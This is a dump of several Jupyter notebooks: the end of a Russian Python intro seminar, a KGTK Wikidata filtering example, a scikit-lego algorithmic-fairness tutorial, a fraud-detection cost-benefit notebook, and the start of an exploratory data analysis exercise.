тому же, написание интерактивных приложений само по себе забавное занятие. Напишем, например, программу, которая здоровается с нами по имени. name = input("Введите ваше имя: ") print("Привет,",name) name # Что здесь произшло? В первой строчке мы использовали функцию `input`. Она вывела на экран строчку, которую ей передали (обязательно в кавычках) и запросила ответ с клавиатуры. Я его ввёл, указав своё имя. После чего `input` вернула строчку с именем и присвоила её переменной `name`. # # После этого во второй строке была вызвана функция `print` и ей были переданы две строчки — "Привет," и то, что хранилось в переменной `name` Функция `print` вывела эти две строчки последовательно, разделив пробелом. Заметим, что в переменной `name` по-прежнему лежит та строчка, которую мы ввели с клавиатуры. # Попробуем теперь написать программу «удвоитель». Она должна будет принимать на вход число, удваивать его и возвращать результат. x = input("Введите какое-нибудь число: ") y = x * 2 print(y) # Что-то пошло не так. Что именно? Как это исправить? # ## 6. Учимся дружить с поисковиками # # __Задача:__ я хочу сгенерировать рандомное число, но я не знаю как это сделать. # # В этом месте ваш семинарист совершит смертельный номер. Он загуглит у вас на глазах как сгенерировать случайное число и найдёт код для этого. # + # Местечко для маленького чуда # - # Увидели чудо? Давайте договоримся, что вы не будете стесняться гуглить нужные вам команды и искать ответы на свои вопросы в интернете. Если уж совсем не выходит, задавайте их в наш чат технической поддержки в Телеграм. # ## 7. Контест # # Яндекс.Контест - это система для автоматического тестирования кода. Вы будете сталкиваться с ней в течение всего нашего курса. Давайте попробуем поработать с ней и перенесём туда решение задачки с вводом имени. # # > Задачи для первого семинара доступны тут: https://official.contest.yandex.ru/contest/24363/enter/ # # Всё оставшееся время мы будем решать задачи из контеста. Рекомендуемый список: B,H,O,X, любые другие :) # + ### ╰( ͡° ͜ʖ ͡° )つ▬▬ι═══════ bzzzzzzzzzz # will the code be with you # - # ## 8. Дзен Python и PEP-8 # # Как мы увидели выше, команда `import` позволяет подгрузить различные пакеты и модули. Один из модулей, который обязательно нужно подгрузить на первой же паре - это модуль `this` import this # Разработчики языка Python придерживаются определённой философии программирования, называемой «The Zen of Python» («Дзен Питона», или «Дзен Пайтона»). Выше мы вывели на экран именно её. Изучите эту философию и тоже начните её придерживаться. # # Более того, мы рекомендуем вам изучить [стайлгайд по написанию кода PEP 8.](https://pythonworld.ru/osnovy/pep-8-rukovodstvo-po-napisaniyu-koda-na-python.html) В конце курса вас будет ждать домашка с код-ревью. В ней мы будем требовать, чтобы вы придерживались PEP 8. Код должен быть читаемым :) # ## Ваше задание # # - Дорешать взе задачи из [первого контеста.](https://official.contest.yandex.ru/contest/24363/enter/) Обратите внимание, что они полностью соотвествуют [первой неделе](https://www.coursera.org/learn/python-osnovy-programmirovaniya/home/week/1) рекомендованного вам курса с Coursera. Можно решать их в контесте, можно на курсере. Как вам будет удобнее. Постарайтесь решить хотябы половину их них. # - В качестве альтернативы мы можете попробовать порешать [похожие задачи с pythontutor](https://pythontutor.ru/lessons/inout_and_arithmetic_operations/) # # Решение этих заданий нами никак не проверяется. Они нужны для практики, чтобы впоследствии вам было легче решать домашние работы и самостоятельные работы. # # > Более того, можно просить разбирать на семинарах и консультациях задачи, которые вы не смогли решить либо не поняли. Об этом можно попросить своего семинариста или ассистентов. # ![](https://raw.githubusercontent.com/FUlyankin/stickers/master/2-itog_stickers/zen.png) #
sem01_intro/sem01_intro.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Example Scenario 2: Validation and statistics on a subset of Wikidata # # *Bob wants to extract a subset of Wikidata with the `member of (P463)` property, clean it, remove irrelevant columns (for this task), and compute its statistics, including centrality metrics.* # ## Preparation (same as in Example 3) # # To run this notebook, Bob would need the Wikidata edges file. We will work with version `20200405` of Wikidata. Presumably, this file is not present on Bob's laptop, so we need to download and unpack it first: # * please download the file [here](https://drive.google.com/file/d/1WIQIYXJC1IdSlPchtqz0NDr2zEEOz-Hb/view?usp=sharing) # * unpack it by running : `gunzip wikidata_edges_20200504.tsv.gz` # # You are all set! # # *Note*: Here we assume that the Wikidata file has already been transformed to KGTK format from Wikidata's `json.bz2` dump. This can be done with the following KGTK command (for demonstration purposes, we will skip this command, as its execution takes around 11 hours): `kgtk import_wikidata -i wikidata-20200504-all.json.bz2 --node wikidata_nodes_20200504.tsv --edge wikidata_edges_20200504.tsv -qual wikidata_qualifiers_20200504.tsv` # ## Implementation in KGTK # # We filter the data for all `P463` relations. # + language="bash" # kgtk filter -p ' ; P463 ; ' wikidata_edges_20200504.tsv > p463.tsv # - # Next, we clean it and remove columns that are not relevant for this use case: # %env ignore_cols=id,rank,node2;magnitude,node2;unit,node2;item,node2;lower,node2;upper,node2;entity-type,node2;longitude,node2;latitude,node2;date,node2;calendar,node2;precision # + language="bash" # kgtk clean_data --error-limit 0 p463.tsv / remove_columns -c "$ignore_cols" | grep . > graph.tsv # - # Finally, we compute graph statistics: # + language="bash" # kgtk graph_statistics --directed --degrees --pagerank --log p463_summary.txt graph.tsv > p463_stats.tsv # - # You can now inspect the individual node metrics in `p463_stats` or read the summary in `p463_summary.txt`. # # For example, we learn that the mean degree is 2.45 and that the node with a highest PageRank is ORCID, Inc. (`Q19861084`).
examples/Example2 - Curation and Statistics.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] colab_type="text" id="FD2lUW6682_3" # # One Way to Measure Algorithmic Fairness # > as described in the scikit-lego documentation # - toc: true # - badges: true # - comments: true # - categories: [machine learning, algorithmic bias, python] # - author: <NAME> # - image: images/algorithmic_fairness.JPG # - search_exclude: false # - permalink: /algorithmic-fairness # - use_math: true # - # > Tip: The code required to replicate the results described in this article is provided in the ```Show Code``` dropdowns. # <br> # + colab={} colab_type="code" id="VoGwzI1h8m1n" #collapse-hide import numpy as np import pandas as pd import matplotlib.pylab as plt from sklearn.datasets import load_boston from sklearn.pipeline import Pipeline from sklearn.preprocessing import StandardScaler from sklearn.linear_model import LinearRegression from sklearn.metrics import mean_squared_error from sklego.preprocessing import InformationFilter import warnings warnings.filterwarnings('ignore') # - # ## tl;dr # # Scikit-Learn comes with a copy of [UC Irvine's ML housing dataset](https://archive.ics.uci.edu/ml/machine-learning-databases/housing/)--perhaps better known as the Boston housing dataset--which was taken from the StatLib library maintained at Carnegie Mellon University. This dataset contains features like "lower status of population" and "the proportion of blacks by town". Consequently, any model made from this dataset is likely to overfit on Mean Squared Error and underfit on fairness, if one was to apply it. Scikit-Lego offers tools to mitigate such fairness issues; a demonstration is provided, along with some discussion of the underpinning mathematical intuition, as originally provided in the [scikit-lego documentation](https://scikit-lego.readthedocs.io/en/latest/). # + [markdown] colab_type="text" id="0AYjzg5P8m1r" # ## Measuring Fairness... # # With a simple pipeline, we can generate a small model and a plot that can convince us that we're doing well. # + colab={} colab_type="code" id="ftuErmm88m1r" outputId="6cd3e6ac-3cf5-4d84-e0ff-6d48f61b74f3" #collapse-hide X, y = load_boston(return_X_y=True) pipe = Pipeline([ ("scale", StandardScaler()), ("model", LinearRegression()) ]) plt.scatter(pipe.fit(X, y).predict(X), y) plt.xlabel("predictions") plt.ylabel("actual") plt.title("Lookin' Good?!") plt.box(False) # + [markdown] colab_type="text" id="Qp1w4rHY8m1y" # We could stop our research here if we think that our Mean Squared Error is "good enough" but this would be dangerous. To find out why, we should look at the variables that are being used in our model. # + colab={} colab_type="code" id="YV1gxEha8m1z" outputId="3491fe2a-751c-4176-92cf-268a7985a7c8" #collapse-hide print(load_boston()['DESCR'][20:1200]) # + [markdown] colab_type="text" id="Jpix47Nr8m13" # This dataset contains features like "% lower status of population" and "the proportion of blacks". Consequently, there's a real possibility that our model will overfit on MSE and underfit on fairness when we want to apply it. Scikit-Lego provides support with respect to fairness issues like this one. # # Dealing with issues such as fairness in machine learning can in general be done in three ways: # # 1. Data preprocessing # 2. Model contraints # 3. Prediction postprocessing # # But before we can dive into methods for getting more fair predictions, we first need to define how to measure fairness. # # # ### ...of Regression # # Measuring fairness can be done in many ways but we'll consider one definition: the output of the model is fair with regards to groups $A$ and $B$ if prediction has a distribution independant of group \\(A\\) or \\(B\\). In simpler terms, if group $A$ and $B$ don't get the same predictions: not good. # # Formally, this can be written as: # # <br> # # $$fairness = \left\lvert \frac{1}{|Z_1|} \sum_{i \in Z_1} \hat{y}_{i} - \frac{1}{|Z_0|} \sum_{i \in Z_0} \hat{y}_{i} \right\rvert$$ # # <br> # # where $Z_1$ is the subset of the population where our sensitive attribute is true, and $Z_0$ the subset of the population where the sensitive attribute is false # # To estimate this we'll use bootstrap sampling to measure the models bias. # # ### ...of Classification # # A common method for measuring fairness is __demographic parity__[<sup>1</sup>](#fn1), for example through the p-percent metric. # The idea behind it is that it requires that a decision — such as accepting or denying a loan application — be independent of the protected attribute. In other words, we expect the __positive__ rate in both groups to be the same. In the case of a binary decision $\hat{y}$ and a binary protected attribute $z$, this constraint can be formalized by asking that # # <br> # # $$P(\hat{y}=1 | z=0)=P(\hat{y}=1 | z=1)$$ # # <br> # # You can turn this into a metric by calculating how far off this exact equality your decision process is. This metric is called the p% score # # <br> # # $$\text{p% score} = \min \left(\frac{P(\hat{y}=1 | z=1)}{P(\hat{y}=1 | z=0)}, \frac{P(\hat{y}=1 | z=0)}{P(\hat{y}=1 | z=1)}\right)$$ # # <br> # # In other words, membership in a protected class should have no correlation with the decision. # # In `sklego` this metric is implemented in `sklego.metrics.p_percent_score` and it works as follows: # # + colab={} colab_type="code" id="2TpQqRRe8m14" outputId="312bd585-d58b-4fc3-cf36-d34f7e38930b" #collapse-show from sklego.metrics import p_percent_score from sklearn.linear_model import LogisticRegression sensitive_classification_dataset = pd.DataFrame({ "x1": [1, 0, 1, 0, 1, 0, 1, 1], "x2": [0, 0, 0, 0, 0, 1, 1, 1], "y": [1, 1, 1, 0, 1, 0, 0, 0] }) X, y = sensitive_classification_dataset.drop(columns='y'), sensitive_classification_dataset['y'] mod_unfair = LogisticRegression(solver='lbfgs').fit(X, y) print('p% score:', p_percent_score(sensitive_column="x2")(mod_unfair, X)) # + [markdown] colab_type="text" id="Hk80Phdk8m17" # Of course, no metric is perfect. If we for example use this in a loan approval situation, the demographic parity only looks at loans given, and not at the rate at which loans are paid back. That might result in a lower percentage of qualified people who are given loans in one population than in another. Another way of measuring fairness could be therefore to measure __equal opportunity__[<sup>2</sup>](#fn2) instead. This constraint would boil down to: # # <br> # # $$P(\hat{y}=1 | z=0, y=1)=P(\hat{y}=1 | z=1, y=1)$$ # # <br> # # and be turned into a metric in the same way as above: # # <br> # # $$\text{equality of opportunity} = \min \left(\frac{P(\hat{y}=1 | z=1, y=1)}{P(\hat{y}=1 | z=0, y=1)}, \frac{P(\hat{y}=1 | z=0, y=1)}{P(\hat{y}=1 | z=1, y=1)}\right)$$ # # <br> # # We can see in the example below that the equal opportunity score does not differ for the models as long as the records where `y_true = 1` are predicted correctly. # + colab={} colab_type="code" id="sCgqBYDq8m17" outputId="9ce98f54-c78d-4014-d83e-4134f59b787a" #collapse-show from sklego.metrics import equal_opportunity_score from sklearn.linear_model import LogisticRegression import types sensitive_classification_dataset = pd.DataFrame({ "x1": [1, 0, 1, 0, 1, 0, 1, 1], "x2": [0, 0, 0, 0, 0, 1, 1, 1], "y": [1, 1, 1, 0, 1, 0, 0, 1] }) X, y = sensitive_classification_dataset.drop(columns='y'), sensitive_classification_dataset['y'] mod_1 = types.SimpleNamespace() mod_1.predict = lambda X: np.array([1, 0, 1, 0, 1, 0, 1, 1]) print('equal opportunity score:', equal_opportunity_score(sensitive_column="x2")(mod_1, X, y)) mod_1.predict = lambda X: np.array([1, 0, 1, 0, 1, 0, 0, 1]) print('equal opportunity score:', equal_opportunity_score(sensitive_column="x2")(mod_1, X, y)) mod_1.predict = lambda X: np.array([1, 0, 1, 0, 1, 0, 0, 0]) print('equal opportunity score:', equal_opportunity_score(sensitive_column="x2")(mod_1, X, y)) # + [markdown] colab_type="text" id="sD70gnqN8m1-" # ## Data Preprocessing # When doing data preprocessing we're trying to remove any bias caused by the sensitive variable from the input dataset. By doing this, we remain flexible in our choice of models. # # ### Information Filter # # This is a great opportunity to use the `InformationFilter` which can filter the information of these two sensitive columns away as a transformation step. It does this by projecting all vectors away such that the remaining dataset is orthogonal to the sensitive columns. # # #### How it Works # # The `InformationFilter` uses a variant of the [gram smidt process](https://en.wikipedia.org/wiki/Gram%E2%80%93Schmidt_process) to filter information out of the dataset. We can make it visual in two dimensions; # # <br> # # ![](../images/projections.png) # # <br> # # To explain what occurs in higher dimensions we need to resort to maths. Take a training matrix $X$ that contains columns $x_1, ..., x_k$. If we assume columns $x_1$ and $x_2$ to be the sensitive columns then the information filter will filter out information using this approach; # # <br> # # $$ # \begin{split} # v_1 & = x_1 \\ # v_2 & = x_2 - \frac{x_2 v_1}{v_1 v_1}\\ # v_3 & = x_3 - \frac{x_3 v_1}{v_1 v_1} - \frac{x_3 v_2}{v_2 v_2}\\ # ... \\ # v_k & = x_k - \frac{x_k v_1}{v_1 v_1} - \frac{x_k' v_2}{v_2 v_2} # \end{split} # $$ # # <br> # # Concatenating our vectors and removing the sensitive ones gives us a new training matrix $X_{\text{more fair}} = [v_3, ..., v_k]$. # # ## Experiment # # We will demonstrate the effect of applying this by benchmarking three things: # # 1. Keep $X$ as is. # 2. Drop the two columns that are sensitive. # 3. Use the information filter. # # We'll use the regression metric defined above to show the differences in fairness. # + colab={} colab_type="code" id="OwvWGQ2j8m1_" #collapse-hide X, y = load_boston(return_X_y=True) df = pd.DataFrame(X, columns=['crim','zn','indus','chas','nox', 'rm','age','dis','rad','tax','ptratio', 'b','lstat']) X_drop = df.drop(columns=["lstat", "b"]) X_fair = InformationFilter(["lstat", "b"]).fit_transform(df) X_fair = pd.DataFrame(X_fair, columns=[n for n in df.columns if n not in ['b', 'lstat']]) def simple_mod(): return Pipeline([("scale", StandardScaler()), ("mod", LinearRegression())]) base_mod = simple_mod().fit(X, y) drop_mod = simple_mod().fit(X_drop, y) fair_mod = simple_mod().fit(X_fair, y) base_pred = base_mod.predict(X) drop_pred = drop_mod.predict(X_drop) fair_pred = fair_mod.predict(X_fair) # we're using lstat to select the group to keep things simple selector = df["lstat"] > np.quantile(df["lstat"], 0.5) def bootstrap_means(preds, selector, n=2500, k=25): grp1 = np.random.choice(preds[selector], (n, k)).mean(axis=1) grp2 = np.random.choice(preds[~selector], (n, k)).mean(axis=1) return grp1 - grp2 # + [markdown] colab_type="text" id="BYmGmrZh8m2E" # We can see that the coefficients of the three models are indeed different. # + colab={} colab_type="code" id="B5i3jMvc8m2F" outputId="7ed955c3-de31-48ec-8925-8989719c868b" #collapse-hide pd.DataFrame([base_mod.steps[1][1].coef_, drop_mod.steps[1][1].coef_, fair_mod.steps[1][1].coef_], columns=df.columns) # + [markdown] colab_type="text" id="h99s3Rik8m2J" # ### Measuring Fairness of Original Scenario # + colab={} colab_type="code" id="8ZFQLDeu8m2J" outputId="5985f21c-f135-4000-e539-adda76faf698" #collapse-hide plt.figure(figsize=(10, 5)) plt.subplot(121) plt.scatter(base_pred, y) plt.title(f"MSE: {mean_squared_error(y, base_pred)}") plt.box(False) plt.subplot(122) plt.hist(bootstrap_means(base_pred, selector), bins=30, density=True, alpha=0.8) plt.title(f"Fairness Proxy (Original Scenario)") plt.box(False) # + [markdown] colab_type="text" id="J4KB9hD08m2O" # ### Measuring Fairness after Dropping Columns # + colab={} colab_type="code" id="wHBDxfdq8m2P" outputId="fcb5da67-2e32-416e-89e4-146458873200" #collapse-hide plt.figure(figsize=(10, 5)) plt.subplot(121) plt.scatter(drop_pred, y) plt.title(f"MSE: {mean_squared_error(y, drop_pred)}") plt.box(False) plt.subplot(122) plt.hist(bootstrap_means(base_pred, selector), bins=30, density=True, alpha=0.8, label = 'base') plt.hist(bootstrap_means(drop_pred, selector), bins=30, density=True, alpha=0.8, label = 'drop') plt.legend(loc = 'best', shadow=True) plt.title(f"Fairness Proxy (after Dropping Columns)") plt.box(False) # + [markdown] colab_type="text" id="47snKXJH8m2R" # ### Measuring Fairness after Applying Information Filter # + colab={} colab_type="code" id="3MNyx_pW8m2S" outputId="0ee98b5f-54a6-4386-96fb-c35e3d7ef367" #collapse-hide plt.figure(figsize=(10, 5)) plt.subplot(121) plt.scatter(fair_pred, y) plt.title(f"MSE: {mean_squared_error(y, fair_pred)}") plt.box(False) plt.subplot(122) plt.hist(bootstrap_means(base_pred, selector), bins=30, density=True, alpha=0.8, label = 'base') plt.hist(bootstrap_means(fair_pred, selector), bins=30, density=True, alpha=0.8, label = 'fair') plt.legend(loc = 'best', shadow = True) plt.title(f"Fairness Proxy") plt.box(False) # + [markdown] colab_type="text" id="rmMyVt1R8m2U" # There definitely is a balance between fairness and model accuracy. Which model you'll use depends on the world you want to create by applying your model. # # Note that you can combine models here to make an ensemble too. You can also use the difference between the 1st and last model as a proxy for bias. # + [markdown] colab_type="text" id="-NNlNPxc8m2V" # ## Model Constraints # # Another way we could tackle this fairness problem would be to explicitly take fairness into account when optimizing the parameters of our model. This is implemented in the `DemographicParityClassifier` as well as the `EqualOpportunityClassifier`. # # Both these models are built as an extension of basic logistic regression. Where logistic regression optimizes the following problem: # # <br> # # $$\begin{array}{cl} # {\operatorname{minimize}} & -\sum_{i=1}^{N} \log p\left(y_{i} | \mathbf{x}_{i},\boldsymbol{\theta}\right) # \end{array} # $$ # # <br> # # We would like to instead optimize this: # # <br> # # $$\begin{array}{cl}{\operatorname{minimize}} & -\sum_{i=1}^{N} \log p\left(y_{i} | \mathbf{x}_{i}, # \boldsymbol{\theta}\right)\\ # {\text { subject to }} & \text{fairness} \geq \mathbf{c}\end{array} $$ # # + [markdown] colab_type="text" id="N_05YRId8m2V" # ## Demographic Parity Classifier # # The p% score discussed above is a nice metric but unfortunately it is rather hard to directly implement in the formulation into our model as it is a non-convex function making it difficult to optimize directly. Also, as the p% rule only depends on which side of the decision boundary an observation lies, it is invariant in small changes in the decision boundary. This causes large saddle points in the objective making optimization even more difficult # # Instead of optimizing for the p% directly, we approximate it by taking the covariance between the users’ sensitive # attributes, $z$m, and the decision boundary. This results in the following formulation of our `DemographicParityClassifier`. # # <br> # # $$\begin{array}{cl}{\operatorname{minimize}} & -\sum_{i=1}^{N} \log p\left(y_{i} | \mathbf{x}_{i}, # \boldsymbol{\theta}\right)\\ # {\text { subject to }} & {\frac{1}{N} \sum_{i=1}^{N}\left(\mathbf{z}_{i}-\overline{\mathbf{z}}\right) d_ # \boldsymbol{\theta}\left(\mathbf{x}_{i}\right) \leq \mathbf{c}} \\ # {} & {\frac{1}{N} \sum_{i=1}^{N}\left(\mathbf{z}_{i}-\overline{\mathbf{z}}\right) # d_{\boldsymbol{\theta}}\left(\mathbf{x}_{i}\right) \geq-\mathbf{c}}\end{array} $$ # # <br> # # Let's see what the effect of this is. As this is a Classifier and not a Regressor, we transform the target to a binary variable indicating whether it is above or below the median. Our p% metric also assumes a binary indicator for sensitive columns so we do the same for our `lstat` column. # # Fitting the model is as easy as fitting a normal sklearn model. We just need to supply the columns that should be treated as sensitive to the model, as well as the maximum covariance we want to have. # + colab={} colab_type="code" id="fPbqFJHF8m2V" outputId="8be77550-9522-49e1-ce11-b2528fefa258" #collapse-hide from sklego.linear_model import DemographicParityClassifier from sklearn.linear_model import LogisticRegression from sklego.metrics import p_percent_score from sklearn.metrics import accuracy_score, make_scorer from sklearn.model_selection import GridSearchCV df_clf = df.assign(lstat=lambda d: d['lstat'] > np.median(d['lstat'])) y_clf = y > np.median(y) normal_classifier = LogisticRegression(solver='lbfgs') normal_classifier.fit(df_clf, y_clf) fair_classifier = DemographicParityClassifier(sensitive_cols="lstat", covariance_threshold=0.5) fair_classifier.fit(df_clf, y_clf); # + [markdown] colab_type="text" id="2nyuenXf8m2Z" # Comparing the two models on their p% scores also shows that the fair classifier has a much higher fairness score at a slight cost in accuracy. # # We'll compare these two models by doing a gridsearch on the effect of the `covariance_threshold`. # + colab={} colab_type="code" id="Lub0WTik8m2a" #collapse-hide fair_classifier = GridSearchCV(estimator=DemographicParityClassifier(sensitive_cols="lstat", covariance_threshold=0.5), param_grid={"estimator__covariance_threshold": np.linspace(0.01, 1.00, 20)}, cv=5, refit="accuracy_score", return_train_score=True, scoring={"p_percent_score": p_percent_score('lstat'), "accuracy_score": make_scorer(accuracy_score)}) with warnings.catch_warnings(): warnings.simplefilter("ignore") fair_classifier.fit(df_clf, y_clf); pltr = (pd.DataFrame(fair_classifier.cv_results_).set_index("param_estimator__covariance_threshold")) p_score = p_percent_score('lstat')(normal_classifier, df_clf, y_clf) acc_score = accuracy_score(normal_classifier.predict(df_clf), y_clf) # + [markdown] colab_type="text" id="9pKyYfhn8m2c" # The results of the grid search are shown below. Note that the logistic regression results are of the train set, not the test set. We can see that the increase in fairness comes at the cost of accuracy but this might literally be a fair tradeoff. # + colab={} colab_type="code" id="DohLR8Sd8m2d" outputId="a45cabdd-c8b9-4731-82fb-efc4506991f8" #collapse-hide plt.figure(figsize=(12, 3)) plt.subplot(121) plt.plot(np.array(pltr.index), pltr['mean_test_p_percent_score'], label='fair classifier') plt.plot(np.linspace(0, 1, 2), [p_score for _ in range(2)], label='logistic regression') plt.xlabel("covariance threshold") plt.legend(loc = 'best', shadow = True) plt.title("p% score") plt.box(False) plt.subplot(122) plt.plot(np.array(pltr.index), pltr['mean_test_accuracy_score'], label='fair classifier') plt.plot(np.linspace(0, 1, 2), [acc_score for _ in range(2)], label='logistic regression') plt.xlabel("covariance threshold") plt.legend(shadow = True) plt.title("accuracy") plt.box(False) # + [markdown] colab_type="text" id="T2J5r1i78m2j" # ## Equal Opportunity # # In the same spirit as the `DemographicParityClassifier` discussed above, there is also an `EqualOpportunityClassifier` which optimizes # # <br> # # $$\begin{array}{cl}{\operatorname{minimize}} & -\sum_{i=1}^{N} \log p\left(y_{i} | \mathbf{x}_{i}, # \boldsymbol{\theta}\right) \\ # {\text { subject to }} & {\frac{1}{POS} \sum_{i=1}^{POS}\left(\mathbf{z}_{i}-\overline{\mathbf{z}}\right) d # \boldsymbol{\theta}\left(\mathbf{x}_{i}\right) \leq \mathbf{c}} \\ # {} & {\frac{1}{POS} \sum_{i=1}^{POS}\left(\mathbf{z}_{i}-\overline{\mathbf{z}}\right) # d_{\boldsymbol{\theta}}\left(\mathbf{x}_{i}\right) \geq-\mathbf{c}}\end{array}$$ # # <br> # # where POS is the subset of the population where `y_true = positive_target`. # + colab={} colab_type="code" id="FGEuRKl38m2l" #collapse-hide from sklego.linear_model import EqualOpportunityClassifier fair_classifier = GridSearchCV(estimator=EqualOpportunityClassifier(sensitive_cols="lstat", covariance_threshold=0.5, positive_target=True), param_grid={"estimator__covariance_threshold": np.linspace(0.001, 1.00, 20)}, cv=5, n_jobs=-1, refit="accuracy_score", return_train_score=True, scoring={"p_percent_score": p_percent_score('lstat'), "equal_opportunity_score": equal_opportunity_score('lstat'), "accuracy_score": make_scorer(accuracy_score)}) with warnings.catch_warnings(): warnings.simplefilter("ignore") fair_classifier.fit(df_clf, y_clf); pltr = (pd.DataFrame(fair_classifier.cv_results_).set_index("param_estimator__covariance_threshold")) p_score = p_percent_score('lstat')(normal_classifier, df_clf, y_clf) acc_score = accuracy_score(normal_classifier.predict(df_clf), y_clf) plt.figure(figsize=(12, 3)) plt.subplot(121) plt.plot(np.array(pltr.index), pltr['mean_test_equal_opportunity_score'], label='fair classifier') plt.plot(np.linspace(0, 1, 2), [p_score for _ in range(2)], label='logistic regression') plt.xlabel("covariance threshold") plt.legend(loc = 'best', shadow = True) plt.title("equal opportunity score") plt.box(False) plt.subplot(122) plt.plot(np.array(pltr.index), pltr['mean_test_accuracy_score'], label='fair classifier') plt.plot(np.linspace(0, 1, 2), [acc_score for _ in range(2)], label='logistic regression') plt.xlabel("covariance threshold") plt.legend(loc = 'best', shadow = True) plt.title("accuracy") plt.box(False) # + [markdown] colab_type="text" id="hGLx2Hg18m2q" # ## Sources # # <ol> # <li id="fn1"><NAME> et al. (2017), Fairness Constraints: Mechanisms for Fair Classification</li> # <li id="fn2"><NAME>, <NAME> and <NAME> (2016), Equality of Opportunity in Supervised Learning</li> # </ol> #
_notebooks/2020-05-04-algorithmic-fairness.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: conda_python3 # language: python # name: conda_python3 # --- # # Machine Learning Economics # Or, how to evaluate the costs and benefits of a machine learning project propsal in a business setting. There are many types of machine learning that you might want to evaluate; unsupervised clustering, recommendation, anomalty detection, forecasting, etc. Here, we'll focus on classification. # You will have to assign a quantitative value for each of your model outputs. For classifcation, those are: # - False Positives # - False Negatives # - True Positives # - True Negative # # A false positive is when your model incorrectly classifies an object as falling into the positive class. The ground truth is negative, but your model is classifying it as a positive. Think of an example from disease detection. False positives are highly preferable, because the impact of failing to an instance of the disease is deleterious to human life. Think, "overzealous detection." # # A false negative is the reverse. Your model fails to detect a positive case. You are classifying the event as negative, but the ground truth is actually positive. Think, "failure to detect." # # A true positive is when your model correctly predicts a positive case. # # A true negative is when your model correctly predicts a negative case. # ## Business Case # Now, let's decide on the business case. This is a real scenario from the physical world, and you are going to attempt to build a model that will literally resemble the physical universe. That's certainly a tough task, but with our sophisticated machine learning techniques we are discovering ways of doing this reliably. # Let's consider credit card fraud. Every day, hundreds of thousands of credit card transactions are placed, and only a tiny fraction of those are fraudulent. We need to design a machine learning system capable of detecting that fraud, and we want to make sure that our end result is adding quantitative business value, not detracting from it. # ### Model Outcome Valuation # The true positive in fraudulent credit card transactions is INCREDIBLY high value. Every true positive means you are automatically capturing a potentially fraudlent transaction, saving your customer and yourself a tremendous amount of labor and risk. # Let's assume that, over the course of a year, we're seeing approximate transaction amounts in the following values: # # - 25 dollars for average legitimate transaction amount # - 300 dollars for average fraudulent transaction amount # # For a start, let's just set the value of our model outputs to those average transaction amounts. In reality the cost and benefits are larger, because it's saving you hours of manual labor to handle these cases. We'll consider fraud as the positive case, and normal transactions as the negative case. true_positive = 300 true_negative = 25 # Now, let's look at the false indicators. # overzealous detection # cost to customer and bank of confirming a legitimate transaction false_positive = 50 # failure to detect # cost to customer and bank of failing to detect a fraudulent transaction false_negative = 500 # Given these rough, high-level estimates, let's see what our total year costs are going to be if we assume average transaction amounts of the following. # - 100,000 transactions per day # - 5,000 fraudulent transaction per day total_normal_transactions = 95000 * 365 total_fraudulent_transactions = 5000 * 365 # ## Simulations # Now, let's run a few very lightweight tests to understand the expected costs and values of our machine learning systems. # + # if we catch all fraud expected_value_for_perfect_recall = total_fraudulent_transactions * true_positive print ("Expected value is {}".format(expected_value_for_perfect_recall)) print ("Not bad! That's over $547 million. Over half a billion dollars.") # - # if we don't catch any fraud expected_vallue_for_zero_recall = total_fraudulent_transactions * false_negative print ("Expected value is {}".format(expected_vallue_for_zero_recall)) print ("Yikes, that's over $900 million in loss, almost a full billion dollars.") # In reality, the model output is going to be somewhere in the middle. Let's assume that after you train your model and tune it in SageMaker, your best recall is 90%. # + print (expected_value_for_perfect_recall * 0.9) print ("Ok! So we're still saving almost $500M in aggregation.") # - # But there are costs. If our model is missing 10% of the anomalies, that means 10% of the time we're totally failing to detect these. expected_cost = false_negative * total_fraudulent_transactions * .1 print (-expected_cost) expected_value_fraud_capture = expected_value_for_perfect_recall * 0.9 - expected_cost # This means, for the positive class, we're driving revenue over $400 million. Now let's take a look at the negative class, or the legitimate transactions. expected_value_for_perfect_precision = total_normal_transactions * true_negative print (expected_value_for_perfect_precision) # Great! For correctly classifying all of the normal transactions, we're providing almost $900 million in value. In reality we will probably incorrectly classify at least some of those, so let's reset our precision to 90%. expected_value_for_normal = total_normal_transactions * true_negative * 0.9 print (expected_value_for_normal) print ("With 90% precision, we're anticipating providing over $700 million in value!") # There are also costs. For the normal case, this means the cost of the false positive. Let's assume we have a 10% false positive rate. expected_cost_false_positive = total_normal_transactions * false_positive * 0.1 print (-expected_cost_false_positive) # That looks pricy too! Total costs for the false positive at a rate of 10% brings us to just over $150 million. Let's sum up the expected value for handling normal cases. total_expected_value_normal = expected_value_for_normal - expected_cost_false_positive print (total_expected_value_normal) # Not bad! Our expected value is positive, which is great. That's over $600 million for the normal case. Let's add up the expected value for both the positive and the negative classes, to see where our project stands as a whole. expected_value_total_project = expected_value_for_normal + expected_value_fraud_capture print (expected_value_total_project) print ("This is great!! We've hit over $1 billion here in anticipated value.")
Starter-Code/Economics of Machine Learning.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # <br><hr id="toc"> # # ### In this module... # # In this module, we'll go through the essential exploratory analysis steps: # 1. [Basic information](#basic) # 2. [Distributions of numeric features](#numeric) # 3. [Distributions of categorical features](#categorical) # 4. [Segmentations](#segmentations) # 5. [Advanced segmentations](#advanced-segmentations) # # # This time, however, you'll be in the driver's seat. # <br><hr> # ### First, let's import libraries and load the dataset. # # In general, it's good practice to keep all of your library imports at the top of your notebook or program. # # <br> # **Starting from this project, we'll have you identify which libraries to import.** # * Up to now, we've taken care of this for you so you could focus on the content. # * However, getting familiar with importing libraries is actually pretty important. # * **Tip:** If you forget one, you can always add it here later and re-run this code block. # # We've provided comments for guidance. # + # NumPy for numerical computing # Pandas for DataFrames pd.set_option('display.max_columns', 100) # Matplotlib for visualization # display plots in the notebook # %matplotlib inline # Seaborn for easier visualization # - # Next, let's import the dataset. # * The file path is <code style="color:crimson">'project_files/employee_data.csv'</code> # + # Load employee data from CSV # - # Now we're ready to jump into exploring the data! # <span id="basic"></span> # # 1. Basic information # # Let's begin by displaying the 